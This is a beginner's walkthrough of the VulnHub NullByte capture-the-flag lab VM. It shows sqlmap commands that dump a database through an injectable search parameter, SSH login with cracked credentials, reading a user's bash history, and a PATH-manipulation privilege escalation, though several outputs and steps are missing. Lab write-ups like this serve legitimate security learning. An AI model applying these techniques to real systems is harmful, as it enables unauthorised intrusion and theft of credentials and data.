VulnHub’s NullByte: A Walkthrough
Hello readers,
Since this was my first time laying a hand on a CTF box, I wasn’t exactly sure on what was lying ahead and what I could possibly encounter.
NOTE: Since IP Address of the box will be different for all, I will be stating it simply as IP Address, throughout the article
Let’s start
The credits for creating this box goes to Iy0n.First of all, thanks for creating this box.
You can download the box’s zip file from here-http://ly0n.me/nullbyte/NullByte.ova.zip .Extract it and load up the .ova file onto VMware, which is recommended.
Your own Kali VM (attacker machine) and the box VM (victim machine) should simultaneously be running together, on VMware
RECONAISSANCE
The first aim is to detect the box from our Kali VM. This means to get it’s IP address. We run the ‘netdiscover’ command on our terminal.
NOTE: Victim’s IP Address need not be same, all the time
We now run a Syn Nmap scan on the target. I did it so as to create less noise!
The first thing I would like to probe into, is the http port. It might throw up something interesting.
Enter the Firefox browser and type in the URL.
URL-http://<IP Address>:80
This is what we found. I am getting spooky Illuminati vibes here.
We right click and find that the gif is downloadable. Keep the download path of the gif file in mind.
ENUMERATION
We now run exiftool on the image. Exiftool is useful for gathering metadata about images.
Command-exiftool <Path of gif file>.
Nothing interesting from the exiftool image analysis, but we did find a comment on the gif file. This might be a possible directory path.
Hoping our hunch is right, we enter the directory name onto the browser.
Command-http://<IP>/kzMb5nVYJw
A plain webpage with a single key login is presented to us. I didn't want to jump the gun by running hydra on it.
With the presence of a login, there might be a database attached to it. Let’s try sqlmap.
Command-sqlmap -u http://<IP>/kzMb5nVYJw/420search.php?usrtosearch=1 — dbs
5 databases are associated with the page.
Ignoring the first 3 databases, we will target ‘seth’ database and try to dump all columns from it.
Command-sqlmap http://<IP>/kzMb5nVYJw/420search.php?usrtosearch= -D seth — dump all
After dump, we get the following 2 entries
At first glance, the password looks like it is MD5 encoded. We take help from MD5decrypt.org,to decrypt the same.
I tried the password on the login page we encountered earlier, but nada.
GAINING ACCESS
Trying out the possibility of a ssh remote login, we find
An alternate method is to state the port switch along with port number to the SSH login command. Enter the credentials we obtained earlier.
We are IN!
MAINTAINING ACCESS
Our next task is to escalate privileges.
Seems like basic commands, such as ‘ls’,’ls-la’ etc wont work.
Let’s check the bash history, i.e. the files previously opened by users on this VM.We target ramses’ bash history.
Command-cat /home/ramses/.bash_history
We get this:-
procwatch seems to be an executable file. Let’s probe that.
The path of the executable is-/var/www/backup/procwatch
Upon running it, we find:-
procwatch is a process file and we can infer that 3 processes are listed.sh provides a shell, that runs on elevated privileges than the ‘ramses’ user.
One of the countless ways to elevate privileges is to manipulate our environment variable, i.e. PATH.I will provide the stepwise procedure for the same
LEVERAGING PRIVILEGES
Upon executing procwatch, we gain an elevated user prompt
Upon ‘catting’ the proof.txt file, we get
Yes. Pwned!
REPORTING
Well you have it now!
Conclusion:-
This is surely a good box to start off with and while it may not reach the level and skills required to hack into HTB boxes, well, you need to start from somewhere to end up somewhere.
After my initial CTF box attempt, I have begun to try poking around the new box and reach dead ends, before consulting writeups. I advice others to do the same.
References:-
These are the resources, that I used:-
